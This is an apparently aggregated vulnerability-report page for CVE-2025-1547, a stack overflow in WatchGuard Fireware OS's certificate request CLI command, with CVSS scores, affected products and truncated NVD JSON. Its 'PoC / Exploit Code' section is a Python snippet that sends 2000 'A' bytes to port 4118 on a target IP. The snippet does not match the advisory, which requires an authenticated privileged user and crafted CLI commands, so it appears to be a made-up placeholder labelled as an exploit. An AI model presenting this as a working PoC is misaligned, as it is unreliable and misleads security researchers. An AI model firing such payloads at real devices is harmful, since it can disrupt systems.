Security Vulnerability Report
中文
CVE-2025-1547 CVSS 7.2 HIGH

CVE-2025-1547

Published: 2025-12-04 22:15:48
Last Modified: 2025-12-10 16:06:10
Source: 5d1c2695-1a31-4499-88ae-e847036fd7e3

Description

A stack-based buffer overflow vulnerability [CWE-121] in WatchGuard Fireware OS's certificate request command could allow an authenticated privileged user to execute arbitrary code via specially crafted CLI commands.This issue affects Fireware OS: from 12.0 through 12.5.12+701324, from 12.6 through 12.11.2.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:watchguard:fireware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:watchguard:firebox_m270:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:watchguard:firebox_m290:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:watchguard:firebox_m370:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:watchguard:firebox_m390:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:watchguard:firebox_m440:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:watchguard:fireware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:watchguard:firebox_t15:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:watchguard:firebox_t35:-:*:*:*:*:*:*:* - NOT VULNERABLE
WatchGuard Fireware OS 12.0 - 12.5.12+701324
WatchGuard Fireware OS 12.6 - 12.11.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
python import socket target = '目标IP' port = 4118 # 构造恶意证书请求命令 payload = b'A' * 2000 # 发送payload s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target, port)) s.send(payload) s.close()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-1547", "sourceIdentifier": "5d1c2695-1a31-4499-88ae-e847036fd7e3", "published": "2025-12-04T22:15:48.440", "lastModified": "2025-12-10T16:06:09.860", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stack-based buffer overflow vulnerability [CWE-121] in WatchGuard Fireware OS's certificate request command could allow an authenticated privileged user to execute arbitrary code via specially crafted CLI commands.This issue affects Fireware OS: from 12.0 through 12.5.12+701324, from 12.6 through 12.11.2."}], "metrics": {"cvssMetricV40": [{"source": "5d1c2695-1a31-4499-88ae-e847036fd7e3", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "5d1c2695-1a31-4499-88ae-e847036fd7e3", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:watchguard:fireware:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.0.0", "versionEndExcluding": "12.11.3", "matchCriteriaId": "3BAD15DB-E7A3-46F5-8D79-D8042CBE7CD3"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_m270:-:*:*:*:*:*:*:*", "matchCriteriaId": "E472917E-D6E1-4C2D-B37D-E76FCC7307CA"}, {"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_m290:-:*:*:*:*:*:*:*", "matchCriteriaId": "9A8C7779-4466-4A9E-B191-929E7746DFF7"}, {"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_m370:-:*:*:*:*:*:*:*", "matchCriteriaId": "6CE9A123-B769-4E56-845E-DC3DA6166C78"}, {"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_m390:-:*:*:*:*:*:*:*", "matchCriteriaId": "180FAE8C-2E73-4C09-AA11-0C82A7715FA3"}, {"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_m440:-:*:*:*:*:*:*:*", "matchCriteriaId": "309DBEF2-1D92-4641-827F-D99758B5FFA3"}, {"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_m4600:-:*:*:*:*:*:*:*", "matchCriteriaId": "D1E8CFC5-51FE-4D75-845F-D70C30AF11B0"}, {"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_m470:-:*:*:*:*:*:*:*", "matchCriteriaId": "BBFBA966-E052-4350-9544-3B5D484DBB6B"}, {"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_m4800:-:*:*:*:*:*:*:*", "matchCriteriaId": "EF1E586D-0E88-447A-95E8-5203EF869ADB"}, {"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_m5600:-:*:*:*:*:*:*:*", "matchCriteriaId": "1BC087C4-CB10-46D4-A746-0C462354410C"}, {"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_m570:-:*:*:*:*:*:*:*", "matchCriteriaId": "59389EA2-3067-4AF8-AEC5-FE79E269C170"}, {"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_m5800:-:*:*:*:*:*:*:*", "matchCriteriaId": "445FA7CD-D0AE-4176-9AE5-293B918DE654"}, {"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_m590:-:*:*:*:*:*:*:*", "matchCriteriaId": "1B4A7366-0304-431E-B3E4-719BA575CEAC"}, {"vulnerable": false, "criteria": "cpe:2.3:h:watchguard:firebox_m670:-:*:*:*:*:*:*:*", "matchCriteriaId": " ... (truncated)